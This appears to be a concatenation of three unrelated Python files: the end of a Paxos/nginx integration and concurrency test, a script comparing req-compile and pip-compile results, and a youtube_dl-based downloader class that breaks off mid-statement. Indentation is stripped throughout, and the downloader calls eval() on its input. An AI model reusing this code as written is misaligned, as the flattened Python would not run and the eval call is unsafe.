(request,('get',2,{"key":"i"}),{"ver":2, "key":"i", "val":100}),
# re-set does not change
(request,('set',1,{"key":"i", "val":100}),{"ver":2, "key":"i", "val":100}),
(ngx_stop,('2',), None),
(ngx_stop,('3',), None),
(time.sleep, (1,), None ),
# set without changing require quorum too
(request,('set',1,{"key":"i", "val":100}),ee.QuorumFailure),
(ngx_start,('2',), None),
(time.sleep, (1,), None ),
(request,('set',1,{"key":"i", "val":{"foo":"bar"}}),{ "ver":3, "key":"i", "val":{ "foo":"bar" } }),
# re-set table value
(request,('set',1,{"key":"i", "val":{"foo":"bar"}}),{ "ver":3, "key":"i", "val":{ "foo":"bar" } }),
# set with specific ver
(request,('set',1,{"key":"i", "ver":2, "val":{"foo":"bar"}}),{ "err":{ "Code":"VerNotExist", "Message":3 } }),
# set with different table value
(request,('set',1,{"key":"i", "ver":3, "val":{"FOO":"bar"}}),{ "ver":4, "key":"i", "val":{ "FOO":"bar" } }),
),
( "get",
(init_view,(1,(1,2,3)), {}),
(init_view,(2,(1,2,3)), {}),
(request,('get',1,{"key":"i"}),{"ver":1, "key":"i"}),
(request,('set',1,{"key":"i", "val":100}),{"ver":2, "key":"i", "val":100}),
(request,('get',2,{"key":"i", "ver":2}),{"ver":2, "key":"i", "val":100}),
(request,('get',2,{"key":"i", "ver":0}),{ "err":{ "Code":"VerNotExist", "Message":2 } }),
(request,('get',2,{"key":"i", "ver":1}),{ "err":{ "Code":"VerNotExist", "Message":2 } }),
(request,('get',2,{"key":"i", "ver":3}),{ "err":{ "Code":"VerNotExist", "Message":2 } }),
),
( "unable to elect with only 1 member",
(request,('get_view',1,),ee.NoView),
(request,('get_view',2,),ee.NoView),
(init_view,(1,(1,2,3)), {}),
(request,('get_view',1,),{"ver":1,"key":"view","val":[g123]}),
(request,('get_leader',1,),{"ver":1,"key":"leader"}),
(request,('get_or_elect_leader',1,),ee.QuorumFailure),
),
( "able to elect with only 2 members",
(init_view,(1,(1,2,3)), {}),
(init_view,(2,(1,2,3)), {}),
(request,('get_view',2,),{"ver":1,"key":"view","val":[g123]}),
(request,('get_or_elect_leader',1,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_or_elect_leader',1,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_or_elect_leader',2,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_leader',1,),{"ver":2,"key":"leader", "val":{"ident":"1", "__lease":1}}),
(time.sleep, (1,), None ),
(request,('get_leader',1,),{"ver":2,"key":"leader","val":{"ident":"1", "__lease":0}}),
(time.sleep, (1,), None ),
(request,('get_leader',1,),{"ver":2,"key":"leader"}),
(request,('get_or_elect_leader',2,),{"ver":3,"key":"leader","val":{"ident":"2", "__lease":1}}),
# get leader with version specified
(request,('get',2,{"key":"leader", "ver":3}),{"ver":3,"key":"leader","val":{"ident":"2", "__lease":1}}),
(request,('get',2,{"key":"leader", "ver":4}),{"err": { "Code": "VerNotExist", "Message":3 }}),
),
( "unable to elect with 2 members with different ver",
(init_view,(1,(1,2,3)), {}),
(request,('get_view',1,),{"ver":1,"key":"view","val":[g123]}),
(init_view,(2,(1,2,3), 2), {}),
(request,('get_view',2,),{"ver":2,"key":"view","val":[g123]}),
# 1 will load latest version=2 from 2, and then try to elect
# leader with version=2 and would found that it locally does not
# have committed data with version=2
(request,('get_or_elect_leader',1,),ee.QuorumFailure),
(request,('get_or_elect_leader',2,),ee.QuorumFailure),
(request,('get_leader',1,),{"ver":2, "key":"leader"}),
),
( "elect with dual view",
(init_view,(1,((1,2,3), (1,2))), {}),
(init_view,(2,((1,2,3), (1,2))), {}),
(request,('get_view',2,),{"ver":1,"key":"view","val":[g123, g12]}),
(request,('get_or_elect_leader',1,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_or_elect_leader',1,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_or_elect_leader',2,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_leader',1,),{"ver":2,"key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('read',1,),{"ver":2,"val":{"leader":{"ident":"1", "__lease":1}, "view":[g123, g12]}}),
(time.sleep, (1,), None ),
(request,('get_leader',1,),{"ver":2,"key":"leader","val":{"ident":"1", "__lease":0}}),
(time.sleep, (1,), None ),
(request,('get_leader',1,),{"ver":2,"key":"leader"}),
(request,('get_or_elect_leader',2,),{"ver":3,"key":"leader","val":{"ident":"2", "__lease":1}}),
),
( "elect failure with dual view",
(init_view,(1,((1,2,3), (1,3))), {}),
(init_view,(2,((1,2,3), (1,3))), {}),
(request,('get_view',2,),{"ver":1,"key":"view","val":[g123, g13]}),
(request,('get_or_elect_leader',1,),ee.QuorumFailure),
),
( "change_view",
(init_view,(1,(1,)), {}),
(ngx_stop,(2,),None),
(request,('get_view',1,),{"ver":1,"key":"view","val":[g1]}),
(request,('change_view',1,{"add":g23}),{"ver":3,"key":"view","val":[g123]}),
(request,('get_view',1,),{"ver":3,"key":"view","val":[g123]}),
(request,('get_view',3,),{"ver":3,"key":"view","val":[g123]}),
(request,('change_view',1,{"add":g23}),{"ver":3,"key":"view","val":[g123]}),
),
( "change_view without any change",
(init_view,(1,(1,)), {}),
(request,('get_view',1,),{"ver":1,"key":"view","val":[g1]}),
(request,('change_view',1,{}), {"ver":1,"key":"view","val":[g1]}),
(request,('get_view',1,),{"ver":1,"key":"view","val":[g1]}),
),
( "change_view in process, come to consistent state",
(init_view,(1,((1,),(1,2)),2), {}),
(request,('get_view',1,),{"ver":2,"key":"view","val":[g1, g12]}),
(request,('get_view',2,),ee.NoView),
(request,('change_view',1,{}), ee.DuringChange),
(request,('get_view',1,),{"ver":3,"key":"view","val":[g12]}),
),
( "change_view with unmatched versions",
(init_view,(1,(1,2,3),2), {}),
(request,('get_view',1,),{"ver":2,"key":"view","val":[g123]}),
(request,('get_view',2,),ee.NoView),
(init_view,(3,(1,2,3),3), {}),
(request,('get_view',3,),{"ver":3,"key":"view","val":[g123]}),
# change_view fix unmatched versions
(request,('change_view',1,{"del":g1}),{"ver":5,"key":"view","val":[g23]}),
(request,('get_view',1,),{"ver":5,"key":"view","val":[g23]}),
(request,('get_view',2,),{"ver":5,"key":"view","val":[g23]}),
(request,('get_view',3,),{"ver":5,"key":"view","val":[g23]}),
),
)
for case in cases:
ngx_restart('123')
init_sto()
mes = case[0]
out( "" )
out( "="*7, mes )
for actions in case[1:]:
f, args, rst = actions[:3]
if len(actions) == 4:
rst_filter = actions[3]
else:
rst_filter = lambda x:x
r = f( *args ) or {}
b = r.get('body')
b = rst_filter(b)
out( "" )
out( f.__name__, args )
import pprint
pprint.pprint( rst )
pprint.pprint( b )
assert b == rst, "expect to be " +repr(rst) + " but: " +repr(b)
out( 'OK: ', )
out( r.get('status'), r.get('body') )
def incr_worker(incr_key, idents, n):
cur_ver = 1
for i in range( n ):
for n_try in range( 1, 1024*1024 ):
randsleep( 0.3 )
to_ident = idents[ random.randint( 0, len(idents)-1 ) ]
mes = [ "key-{0}".format( incr_key ),
"incr-{i} try-{n_try}".format( i=i, n_try=n_try ),
"req to:", to_ident,
"with ver:", cur_ver,
]
try:
b = request_ex( "get", to_ident, { "key":incr_key } )
remote_ver, remote_val = b[ 'ver' ], b.get('val')
if remote_ver < cur_ver:
# unfinished commit might be seen,
continue
if remote_ver >= cur_ver:
# get might see uncommitted value. thus version might
# not be seen in future read
if remote_val == i + 1:
dd( mes, "unfinished done", "get", b )
elif remote_val != i:
dd( mes, "error: remote val is: {val}, i={i}, ver={ver}".format(val=remote_val, i=i, ver=remote_ver) )
sys.exit( 1 )
b = request_ex("set", to_ident, {"key":incr_key, "ver":cur_ver, "val":i+1})
dd( mes, "ok", "set", b )
cur_ver = b['ver']
b = request_ex( "read", to_ident, {"ver":b[ 'ver' ]} )
ver = b['ver']
vals = [ b['val'].get( x, 0 ) for x in idents ]
total = sum(vals)
dd( mes, "ver=", b['ver'], "total=", total, "vals=", *vals )
assert total == ver - 1, 'total == ver - 1: %d, %d' %( total, ver )
break
except socket.error as e:
pass
except PaxosError as e:
dd( mes, "err", e.Code, e.Message )
if e.Code == 'VerNotExist' and cur_ver < e.Message:
cur_ver = e.Message
dd( mes, 'refreshed ver to', cur_ver )
randsleep()
except Exception as e:
dd( mes, "err", repr(e) )
monkeysess = { 'enabled': True }
def monkey(sess):
if not monkeysess[ 'enabled' ]:
return
stat = dict( [ (x, True) for x in sess['idents'] ] )
while sess[ 'running' ]:
ident = sess['idents'][ random.randint( 0, len(sess['idents'])-1 ) ]
try:
if stat[ ident ]:
ngx_stop( ident )
os.write( 1, 'nginx stopped: ' + ident + '\n' )
stat[ ident ] = False
else:
ngx_start( ident )
os.write( 1, 'nginx started: ' + ident + '\n' )
stat[ ident ] = True
randsleep()
except Exception as e:
os.write( 1, repr( e ) + ' while nginx operation: ' + ident + '\n' )
def concurrency_test():
ngx_restart('123')
init_sto()
idents = [ x for x in '123' ]
nthread = 5
nincr = 500
nmonkey = 1
for ident in idents:
body = { "ver":1,
"val": {
"1":0,
"2":0,
"3":0,
"view": [ {
"1":"1",
"2":"2",
"3":"3", }, ],
}
}
request( 'phase3', ident, body )
ths = []
for ident in idents:
th = threading.Thread( target=incr_worker, args=( ident, idents, nincr ) )
th.daemon = True
th.start()
ths.append( th )
sess = { 'running':True, "idents":idents,
'locks': dict( [ (x, threading.RLock()) for x in idents ] )
}
monkeys = []
for ii in range( nmonkey ):
monkey_th = threading.Thread( target=monkey, args=( sess, ) )
monkey_th.daemon = True
monkey_th.start()
monkeys.append( monkey_th )
for th in ths:
while th.is_alive():
th.join(0.1)
sess[ 'running' ] = False
for th in monkeys:
th.join()
if __name__ == "__main__":
import it.ngxconf
it.ngxconf.make_conf(3)
integration_test()
monkeysess[ 'enabled' ] = True
concurrency_test()
monkeysess[ 'enabled' ] = False
concurrency_test()
|
compare_with_pip_compile.py
|
from __future__ import print_function
import os
import shutil
import subprocess
import sys
import tempfile
import threading
import time
from argparse import ArgumentParser
import pkg_resources
from req_compile.utils import reqs_from_files, normalize_project_name, has_prerelease
def run_qer_compile(reqfile, index_url=None):
output_file, name = tempfile.mkstemp()
error_file, error_name = tempfile.mkstemp()
try:
subprocess.check_call([sys.executable, '-m', 'req_compile', reqfile,
'--wheel-dir', '.wheeldir', '--verbose'],
stdout=output_file, stderr=error_file)
os.lseek(output_file, 0, os.SEEK_SET)
print('\n' + os.read(output_file, 128000).decode('utf-8') + '\n', file=sys.stderr)
return name
except subprocess.CalledProcessError:
os.lseek(error_file, 0, os.SEEK_SET)
print('\n' + os.read(error_file, 128000).decode('utf-8') + '\n', file=sys.stderr)
raise
finally:
os.close(output_file)
os.close(error_file)
def run_pip_compile(reqfile, index_url=None):
output_file, name = tempfile.mkstemp()
os.close(output_file)
# '--rebuild',
subprocess.check_output([sys.executable, '-m', 'piptools', 'compile', reqfile, '-o', name])
return name
def filter_out_blacklist(req_set):
return {req for req in req_set
if req.name.lower() not in ('setuptools', 'pip', 'distutils', 'distribute', 'documenttemplate', 'cython')}
def normalize_reqs(req_set):
return {pkg_resources.Requirement.parse(str(req).replace(req.name, normalize_project_name(req.name)))
for req in req_set}
def do_qer(reqfile, results_queue):
print('Compiling with Req-Compile...')
qer_failed = False
qer_output_file = None
try:
start = time.time()
qer_output_file = run_qer_compile(reqfile)
print(' DONE qer ({} seconds)'.format(time.time() - start))
except Exception:
qer_failed = True
results_queue.append((qer_output_file, qer_failed))
def do_pip(reqfile, results_queue):
print('Compiling with pip-compile...')
pip_failed = False
pip_output_file = None
try:
start = time.time()
pip_output_file = run_pip_compile(reqfile)
print(' DONE pip ({} seconds)'.format(time.time() - start))
except Exception:
pip_failed = True
results_queue.append((pip_output_file, pip_failed))
def main():
parser = ArgumentParser()
parser.add_argument('requirements_file')
parser.add_argument('-i', '--index-url', type=str, default=None)
parsed_args = parser.parse_args()
failed = True
qer_output_file = None
pip_output_file = None
try:
qer_queue = []
qer_thread = threading.Thread(target=do_qer, args=(parsed_args.requirements_file, qer_queue))
qer_thread.start()
pip_queue = []
pip_thread = threading.Thread(target=do_pip, args=(parsed_args.requirements_file, pip_queue))
pip_thread.start()
qer_thread.join()
pip_thread.join()
qer_output_file, qer_failed = qer_queue[0]
pip_output_file, pip_failed = pip_queue[0]
if qer_failed:
if not pip_failed:
print('Req-Compile failed but pip-tools did not')
sys.exit(2)
if pip_failed:
if not qer_failed:
print('Pip-compile failed but req-compile did not')
sys.exit(3)
if not (qer_failed or pip_failed):
failed = False
qer_reqs = filter_out_blacklist(set(reqs_from_files([qer_output_file])))
pip_reqs = filter_out_blacklist(set(reqs_from_files([pip_output_file])))
qer_reqs = normalize_reqs(qer_reqs)
pip_reqs = normalize_reqs(pip_reqs)
if any(has_prerelease(req) for req in pip_reqs):
print('Skipping because pip-compile resolved a pre-release')
sys.exit(0)
if qer_reqs != pip_reqs:
print('Reqs do not match!')
qer_only = qer_reqs - pip_reqs
pip_only = pip_reqs - qer_reqs
for qer_req in set(qer_only):
print('Validating {}'.format(qer_req))
matching_pip_req = [
req for req in pip_only if req.name == qer_req.name
]
for req in matching_pip_req:
qver = pkg_resources.parse_version(next(iter(qer_req.specifier)).version)
pver = pkg_resources.parse_version(next(iter(req.specifier)).version)
print('Comparing versions {} {}'.format(qver, pver))
if qver == pver:
print('They matched, removing both')
qer_only.remove(qer_req)
pip_only.remove(req)
if qer_only or pip_only:
print('Qer only reqs: {}'.format(qer_only))
print('Pip only reqs: {}'.format(pip_only))
sys.exit(1)
else:
sys.exit(0)
except Exception as ex:
print('Failed due to: {} {}'.format(ex.__class__, ex))
finally:
if qer_output_file:
os.remove(qer_output_file)
if pip_output_file:
os.remove(pip_output_file)
if __name__ == '__main__':
main()
|
downloader.py
|
from __future__ import unicode_literals
import os, sys
import re
import shutil
import traceback
import threading
from youtube_dl.downloader.http import HttpFD
from youtube_dl.downloader.hls import HlsFD
from youtube_dl.downloader.M3u8Downloader import FFmpegFD as FFmpegFDEx
from youtube_dl.downloader.OldM3u8Downloader import WSM3u8FD as WSM3u8FD
from youtube_dl.downloader.external import FFmpegFD
from youtube_dl.downloader.httpCrul import HttpCurl
from youtube_dl.utilsEX import (
get_top_host,
GoogleAnalytics
)
import youtube_dl
from youtube_dl.compat import (
compat_str,
)
from youtube_dl.WS_Extractor import (
YoutubeDLPatch4Single
)
from urlparse import urlparse
class downloader:
def buildOptions(self, verbose=False):
ydl_opts = {}
ydl_opts['debug_printtraffic'] = 1
ydl_opts['playlistend'] = 1
#ydl_opts['socket_timeout'] = 600
#2017.08.10
ydl_opts['source_address'] = '0.0.0.0'
ydl_opts['verbose'] = 1
ydl_opts['continuedl'] = 1
ydl_opts['nopart'] = True
ydl_opts['skip_unavailable_fragments'] = False
ydl_opts['fragment_retries'] = 10
ffmpeg_name = os.getenv('KVFfmpegPath')
if ffmpeg_name is None:
debug('get KVFfmpegPath failed')
debug('Try Get KVFfmpegPath Begin----------------------------------------------------')
if sys.platform == 'win32':
ffmpeg_name = r'DownloadRes\ffmpeg.exe' if os.path.exists(r'DownloadRes\ffmpeg.exe') else 'ffmpeg.exe'
else:
ffmpeg_name = 'ffmpeg'
try:
# 日文路径,os.path.join(os.path.abspath(os.curdir), ffmpeg_name)会出异常,所以用相对路径置之
try:
ydl_opts['ffmpeg_location'] = os.path.join(os.path.abspath(os.curdir), ffmpeg_name)
except:
ydl_opts['ffmpeg_location'] = ffmpeg_name
if not os.path.exists(ydl_opts['ffmpeg_location']):
debug('_file__Begin')
debug(__file__)
ydl_opts['ffmpeg_location'] = os.path.join(os.path.abspath(os.path.dirname(__file__)), ffmpeg_name)
debug('_file__End')
debug(ydl_opts['ffmpeg_location'])
except:
pass
debug('Try Get KVFfmpegPath End----------------------------------------------------')
else:
debug('get KVFfmpegPath:' + ffmpeg_name)
ydl_opts['ffmpeg_location'] = ffmpeg_name
return ydl_opts
def __init__(self, callback, infos):
self._callback = callback
self._imageSavePath = infos['imageSavePath']
self._infos = infos
self._cancel = False
self._subtitleFile = ''
self._downloadingFile = ''
self._ydl = YoutubeDLPatch4Single(self.buildOptions(False))
if sys.platform == 'win32':
self._GA = GoogleAnalytics( 'UA-100395100-3')
else:
self._GA = GoogleAnalytics( 'UA-100395100-4')
#下载进度回调钩子
def progress_hook(self, s):
if self._cancel:
raise Exception('cancel')
if self.downloadThumbailAndIcon:
return
def safeGetValue(dict, key, default):
value = dict.get(key, default)
return value if value else default
if s['status'] == 'downloading':
downloaded_bytes = safeGetValue(s, 'downloaded_bytes', 0)
total_bytes = safeGetValue(s, 'total_bytes', 0) if ('total_bytes' in s) else safeGetValue(s, 'total_bytes_estimate', 0)
self._infos['downloadingFiles'][self._downloadingFile]['downloadedSize'] = downloaded_bytes
total_bytes = total_bytes if total_bytes else 1024 * 1024 * 1024 * 2
if total_bytes < (downloaded_bytes-1024):
print( 'total_bytes < downloaded_bytes total_bytes:%d downloaded_bytes:%d' % (total_bytes, downloaded_bytes))
total_bytes = downloaded_bytes + 50 * 1024 * 1024
self._infos['downloadingFiles'][self._downloadingFile]['fileSize'] = total_bytes
downloaded_bytes = total_bytes = 0
for item in self._infos['downloadingFiles'].values():
downloaded_bytes += safeGetValue(item, 'downloadedSize', 0)
total_bytes += safeGetValue(item, 'fileSize', 0)
msg = {
'event': 'downloading',
'fileSize': total_bytes,
'downloadedSize': downloaded_bytes,
}
if s.get('speed', None):
msg['speed'] = s['speed']
if self._callback:
self._callback(msg)
def testDownloader(self, func, info, fileName = None):
if fileName:
self.downloaderTestResult = func(info, fileName)
else:
self.downloaderTestResult = func(info)
#真实下载
def get_suitable_downloader(self, filename, info):
params = self._ydl.params
fd = youtube_dl.downloader.get_suitable_downloader(info, {})(self._ydl, params)
if type(fd) == HttpFD:
#如果目标路径下存在该文件那么说明使用的是httpFD
if not os.path.exists(filename):
debug('-----------------------Test HttpCurl------------------')
hc = HttpCurl(self._ydl, params)
self.downloaderTestResult = False
t = threading.Thread(target=self.testDownloader, args=(hc.testUrl, info))
t.start()
t.join(10)
if self.downloaderTestResult:
fd = hc
if self._infos.get('speedUp', 'False') == 'True':
fd.openSpeedup()
debug('-----------------------Test HttpCurl %s------------------' % ('success' if type(fd) ==HttpCurl else 'fail'))
elif type(fd) in [FFmpegFD, HlsFD]:
if self._infos.get('url', '').find('youku') > -1 or self._infos.get('url', '').find('tudou') > -1 or \
self._infos.get('url', '').find('iview.abc.net.au')>-1:
return HlsFD(self._ydl, params)
try:
if 'http_headers' in info and info['http_headers'] and 'Accept-Encoding' in info['http_headers']:
info['http_headers'].pop('Accept-Encoding')
except:
pass
debug('-----------------------Select M3u8 Download Begin------------------')
#目标下存在DS后缀的同名文件,且文件大小大于20K,那么就直接使用WSM3u8FD
tempFileName = '%s.ds' % filename
if os.path.exists(tempFileName) and os.path.getsize(tempFileName) > 1024 * 20:
debug('-----------------------Select M3u8 Download Use WSM3u8FD------------------')
dl = WSM3u8FD(self._ydl, params)
elif os.path.exists(filename):
debug('-----------------------Select M3u8 Download Use FFmpegFDEx------------------')
#或者如果存在不包含DS的目标文件,那么说明使用了FFMEPG
dl = FFmpegFDEx(self._ydl, params)
else:
debug('-----------------------Test WSM3u8FD------------------')
dl = WSM3u8FD(self._ydl, params)
if not dl.testUrl(filename, info):
dl = None
debug('-----------------------Test WSM3u8FD %s------------------' % ('success' if dl else 'fail'))
if not dl:
dl = FFmpegFDEx(self._ydl, params)
debug('-----------------------Select M3u8 Download End------------------')
fd = dl
debug(fd)
return fd
def _beforeDownload(self, filename, info):
debug('_download begin %s' % filename)
debug('......info......')
debug(info)
debug('......info......')
if type(filename) != compat_str:
try:
filename = unicode(filename)
except:
filename = filename.decode('utf-8')
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
return filename
def _download(self, filename, info):
filename = self._beforeDownload(filename, info)
if type(info) is not dict:
info = eval(info)
#'protocol': 'http_dash_segments',
url = self._infos.get('url', None)
host = get_top_host(url) if url else ''
for i in range(3):
try:
debug('downloader.py _download try %d' % i)
if info.has_key('fragments'):
info['protocol'] = 'http_dash_segments'
fd = self.get_suitable_downloader(filename, info)
fd.add_progress_hook(self.progress_hook)
if fd.download(filename, info):
try:
url = self._infos.get('url', None)
url = get_top_host(url) if url else ''
self._GA.send('event', 'download_success', type(fd).__name__, host)
except:
pass
break
else:
raise Exception('downloadFail')
except:
if self._cancel:
break
debug(traceback.format_exc())
if i == 2:
try:
self._GA.send('event', 'download_fail', type(fd).__name__, host)
self._GA.send('event', 'fail_detail', host, traceback.format_exc())
except:
pass
raise Exception(traceback.format_exc())
else:
threading._sleep(1)
debug('_download end')
def downloadSubtitle(self):
try:
if ('subtitleUrl' not in self._infos or self._infos.get('subtitleUrl', None) == None):
if ('subtitle_data' not in self._infos or self._infos.get('subtitle_data', None) == None):
return
self._subtitleFile = os.path.join(self._downloadtempPath, '%s.srt' % self._infos['fileNameWithoutExt'])
if os.path.exists(self._subtitleFile):
return
if 'subtitleUrl' in self._infos:
subtitleUrl = self._infos.get('subtitleUrl')
from sniffer import (
YoutubeSubtitle
)
str = YoutubeSubtitle(self._ydl).getSubtitleContent(subtitleUrl)
else:
str = self._infos['subtitle_data']
if str != '':
f = open(self._subtitleFile, 'wb')
f.write(str)
f.close()
if os.path.exists(self._subtitleFile):
msg = {
'event':'download_Subtitle',
'filePath': self._subtitleFile
}
if self._callback:
self._callback(msg)
except Exception as e:
print (e)
pass
def downloadWebSiteIcon(self, url, savePath):
if url == '':
return
debug('downloadWebSiteIcon begin')
try:
if (not re.search(r'//', url)):
url = 'http://' + url
o = urlparse(url)
fileName = os.path.join(savePath, '%s.ico' % o.netloc)
if not os.path.exists(fileName):
webpage = self._ydl.urlopen(url).read()
mobj = re.search(r'<link rel="shortcut icon"\s*href="([^\"]+)"', webpage)
faviconURL = ''
if mobj:
faviconURL = mobj.group(1)
if (not re.search(r'//', faviconURL)):
if faviconURL.find(r'/') == 0:
faviconURL = 'http://'+ o.netloc + faviconURL
else:
faviconURL = 'http://' + faviconURL
if not os.path.exists(fileName) and faviconURL != '':
info = {'url':faviconURL}
self._downloadSmallFile(fileName, info)
if not os.path.exists(fileName):
faviconURL = '%s://%s/favicon.ico' % (o.scheme, o.netloc)
self._downloadSmallFile(faviconURL, fileName)
if os.path.exists(fileName):
msg = {
'event':'download_icon',
'filePath': fileName
}
if self._callback:
self._callback(msg)
except:
debug(traceback.format_exc())
pass
debug('downloadWebSiteIcon end')
def downloadThumbnail(self, url, fileName):
debug('downloadThumbnail begin')
try:
# 置位,以便于ffmpeg获取
self._infos['thumbnail_filename'] = fileName
if not url or url == '':
return
if not os.path.exists(fileName):
self._downloadSmallFile(url, fileName)
if os.path.exists(fileName):
msg = {
'event':'download_thumbnail',
'filePath': fileName
}
if self._callback:
self._callback(msg)
except:
debug(traceback.format_exc())
pass
debug('downloadThumbnail end')
def downloadThumbnailAndIcon(self, title):
self.downloadThumbailAndIcon = True
try:
self.downloadWebSiteIcon(self._infos.get('url'), self._infos['imageSavePath'])
thumbnailFilename = os.path.join(self._infos['imageSavePath'], '%s.jpg' % title)
self.downloadThumbnail(self._infos.get('thumbnail', ''), thumbnailFilename)
except:
pass
finally:
self.downloadThumbailAndIcon = False
def _downloadSmallFile(self, url, filename):
debug('begin _downloadSmallFile')
try:
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
for proto in ['http', 'https']:
if re.match(r'http', url):
tempUrl = url
else:
if re.match(r'://', url):
tempUrl = '%s%s' % (proto , url)
elif re.match(r'//', url):
tempUrl = '%s:%s' % (proto , url)
else:
tempUrl = '%s://%s' % (proto , url)
try:
webpage = self._ydl.urlopen(tempUrl).read()
f = open(filename, 'wb')
f.write(webpage)
f.close()
debug('end _downloadSmallFile Sucess')
break
except Exception as e:
if re.match(r'http', url):#原来就有http头的就不要重试了
raise e
else:
debug(e)
except Exception as e:
debug('end _downloadSmallFile fail Exception:')
debug(e)
def prepareData(self):
# 准备路径
downloadtempPath = self._infos.get('downloadTempPath')
if not os.path.exists(downloadtempPath):
os.makedirs(downloadtempPath)
self._downloadtempPath = downloadtempPath
#开始下载
if not self._infos.get('downloadingFiles'):
fileName = '%s.%s' % (self._infos['fileNameWithoutExt'], self._infos['ext'])
self._infos['destFileName'] = os.path.join(self._infos.get('downloadDestPath'), fileName)
downloadFiles = {}
for i, item in enumerate(self._infos['formats']):
template = '%d.%s'
fileName = os.path.join(downloadtempPath, template % (i, item['ext']))
downloadFiles[fileName] = {'downloadedSize': 0, 'fileSize': item.get('filesize', 0), 'format': item, 'order': i}
self._infos['downloadingFiles'] = downloadFiles
self._infos.pop('formats')
msg = {
'event': 'download_start',
'quality': self._infos.get('quality'),
'data': self._infos
}
if self._callback:
self._callback(msg)
def fix_dest_filename(self):
if os.path.exists(self._infos['destFileName']):
for i in range(100):
fileName = '%s(%d).%s' % (self._infos['fileNameWithoutExt'], i, self._infos['ext'])
destfileName = os.path.join(self._infos.get('downloadDestPath'), fileName)
if not os.path.exists(destfileName) or i == 99:
self._infos['destFileName'] = destfileName
break
def move_to_dest(self, source):
debug('Copy file to dest dir!')
try:
self.fix_dest_filename()
os.chdir(os.path.dirname(source))
dest = self._infos['destFileName']
os.rename(source, dest)
# 拷贝字幕
if os.path.exists(self._subtitleFile):
debug('Move Subtitle to Dest Begin...')
subtitle_ext = os.path.splitext(self._subtitleFile)[1]
dst_subtitle = os.path.splitext(self._infos['destFileName'])[0] + subtitle_ext
os.rename(self._subtitleFile, dst_subtitle)
debug('Move Subtitle to Dest End')
except Exception as e:
debug(e)
try:
shutil.rmtree(self._infos.get('downloadTempPath'))
except:
pass
def run(self):
try:
self.prepareData()
debug('downloadSubtitle')
self.downloadSubtitle()
debug('downloadThumbnailAndIcon')
self.downloadThumbnailAndIcon(self._infos['fileNameWithoutExt'])
# YouTube视频下载快于音频10倍,若先下载音频,用户感觉慢,因此给视频提前,感觉上下载快些
src_medias = sorted(self._infos['downloadingFiles'].iteritems(), key=lambda item: item[1]['order'])
for key, value in src_medias:
if self._cancel:
raise
self._downloadingFile = key
self._download(key, value['format'])
if self._cancel:
raise
# 传与界面,需要原始顺序
src_files = [item[0] for item in src_medias]
msg = {
'event': 'download_complete',
'sourceFiles': src_files, #文件名
'destFile': self._infos['destFileName'],
'nextAction': self._infos.get('action', 'none'), # 应用层在下载完成之后需要响应的行为包括:"dash_merge(音视频合并), multi_video_merge(多段合并), convert_to_mp3(转换成mp3), none(不需要其他附加行为)"
'thumbnail': self._infos['thumbnail_filename'] if os.path.exists(self._infos['thumbnail_filename']) else ''
}
if os.path.exists(self._subtitleFile):
msg['subtitle'] = self._subtitleFile,
debug('------------------download complete-------------------')
debug(msg)
debug('------------------download complete-------------------')
# mac系统,沿用旧逻辑
if sys.platform != 'win32':
# 正常结束,不需要额外工作
if self._infos.get('action', 'none') == 'none':
self.move_to_dest(self._infos['downloadingFiles'].keys()[0])
msg['destFile'] = self._infos['destFileName']
elif self._infos.get('action', 'none') in ['dash_convert']:
debug('------------------download dash_convert Begin-------------------')
self.dash_merge_WEBM()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------download dash_convert End-------------------')
elif self._infos.get('action', 'none') in ['fixM3u8']:
# 先发消息给产品,以更新其界面显示
if self._callback:
msg['nextAction'] = 'convert_progress'
self._callback(msg)
debug('------------------FFmpeg fixup m3u8 start-------------------')
self.fixup_m3u8()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------FFmpeg fixup m3u8 end-------------------')
# windows系统,底层处理界面逻辑
else:
# 正常结束,不需要额外工作
if self._infos.get('action', 'none') == 'none':
self.move_to_dest(self._infos['downloadingFiles'].keys()[0])
msg['destFile'] = self._infos['destFileName']
elif self._infos.get('action', 'none') in ['dash_convert', 'dash_merge']:
# 先发消息给产品,以更新其界面显示
if self._callback:
msg['nextAction'] = 'merge_progress' if msg['nextAction'] == 'dash_merge' else 'convert_progress'
self._callback(msg)
debug('------------------download dash_convert Begin-------------------')
self.dash_merge_WEBM()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------download dash_convert End-------------------')
# 多段视频连接
elif self._infos.get('action', 'none') in ['multi_video_merge']:
# 先发消息给产品,以更新其界面显示
if self._callback:
msg['nextAction'] = 'merge_progress'
self._callback(msg)
debug('------------------multi video merge start-------------------')
self.multi_video_concat()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------multi video merge end-------------------')
elif self._infos.get('action', 'none') in ['convert2Mp3']:
# 先发消息给产品,以更新其界面显示
if self._callback:
msg['nextAction'] = 'convert_progress'
self._callback(msg)
debug('------------------convert to mp3 start-------------------')
self.convert_to_mp3()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------convert to mp3 end-------------------')
elif self._infos.get('action', 'none') in ['fixM3u8']:
# 先发消息给产品,以更新其界面显示
if self._callback:
msg['nextAction'] = 'convert_progress'
self._callback(msg)
debug('------------------FFmpeg fixup m3u8 start-------------------')
self.fixup_m3u8()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------FFmpeg fixup m3u8 end-------------------')
# 如果正常结束,即'event'为'None',windows这一支获取媒体文件信息
if msg.get('nextAction', 'none') == 'none':
debug('------------------get_mediainfo start-------------------')
self.get_mediainfo(msg)
debug('------------------get_mediainfo end-------------------')
except:
if self._cancel:
msg = {
'event': 'download_cancel',
'quality': self._infos.get('quality'),
'data': self._infos
}
else:
error = traceback.format_exc()
debug(error)
msg = {
